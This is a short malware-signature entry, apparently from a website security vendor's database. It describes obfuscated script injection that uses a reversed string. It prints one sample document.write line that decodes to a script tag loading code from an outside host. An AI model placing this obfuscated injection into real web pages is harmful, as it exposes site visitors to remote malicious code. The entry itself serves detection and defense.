Home Testimonials Company Support 1–888–873–0817
Home Notes Malware Signatures About

Malware entry: malware.reverse_script

Description: Suspicious code that uses the .split("").reverse(​).join("") trick to obfuscate injection of scripts into a web page.

There are many ways to use this trick in malware. The most simple may look like this

document.​write('>tpircs/<>"/rcs/gu.oc​.nocife//:​ptth"=crs tpircs<'.split("").reverse(​).join(""))

Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb